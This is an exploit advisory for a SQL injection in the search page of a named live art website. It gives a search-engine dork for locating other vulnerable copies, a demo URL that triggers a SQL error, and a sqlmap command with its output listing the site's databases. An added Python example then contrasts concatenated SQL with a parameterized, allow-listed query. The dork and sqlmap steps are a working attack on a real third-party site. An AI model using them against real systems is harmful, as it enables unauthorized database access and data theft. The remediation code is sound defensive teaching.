# Exploit Title: Haddad's Fine SQL Injection
--------------------------------------------------------------------------------------------------------
# Date: 29.05.2019
--------------------------------------------------------------------------------------------------------

# Dork: intitle:"Haddad's Fine Arts - Search"
--------------------------------------------------------------------------------------------------------

# Exploit Author: Cerkuday
--------------------------------------------------------------------------------------------------------

# Tested on: Windows & Kali Linux
--------------------------------------------------------------------------------------------------------

# Demo:

http://haddadsfinearts.com/search.php?id=02'
You have an error in your SQL syntax

--------------------------------------------------------------------------------------------------------


# PoC:

sqlmap.py -u "http://haddadsfinearts.com/search.php?id=02" --text-only  --random-agent --dbs

[*] creativeart
[*] curatedimage
[*] giclee
[*] gicleephoto
[*] gicleestudio
[*] haddads
[*] haddadsfinearts
[*] information_schema
[*] mysql
[*] ofmaker
[*] performance_schema
[*] photo_canvas
[*] photocanvas
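
--------------------------------------------------------------------------------------------------------

The syntax error in the Demo means the id value reaches the SQL text itself. The following is an added example, not code from this advisory or the affected site: it shows that pattern beside an allow-listed, parameterized lookup. It assumes a numeric id and uses SQLite in place of MySQL so it runs offline; the table, rows and function names are hypothetical.

```python
import re
import sqlite3

# Constructed stand-in data: an in-memory SQLite table, not the site's MySQL schema.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE artwork (id INTEGER PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO artwork VALUES (?, ?)",
                   [(1, "Harbor at Dusk"), (2, "Orchard Row")])
    return db

def search_concatenated(db, raw_id):
    """Vulnerable pattern: the request value becomes part of the SQL text."""
    sql = "SELECT title FROM artwork WHERE id = " + raw_id
    try:
        return "ok", [row[0] for row in db.execute(sql)]
    except sqlite3.Error as exc:
        # Echoing this message into the page is what exposes the flaw to a visitor.
        return "sql-error", str(exc)

# Assumption: ids are short decimal numbers; anything else is refused outright.
ID_PATTERN = re.compile(r"[0-9]{1,9}")

def search_parameterized(db, raw_id):
    """Hardened pattern: allow-list the value, then bind it as a parameter."""
    if not ID_PATTERN.fullmatch(raw_id):
        return "rejected", []  # respond with a generic 400, no database detail
    rows = db.execute("SELECT title FROM artwork WHERE id = ?", (int(raw_id),))
    return "ok", [row[0] for row in rows]

if __name__ == "__main__":
    db = make_db()
    for value in ("02", "02'"):
        print(repr(value),
              search_concatenated(db, value),
              search_parameterized(db, value))
```

With the bound parameter the quote never becomes SQL syntax, and with the allow-list it never reaches the database at all, so no engine error text is returned to the client.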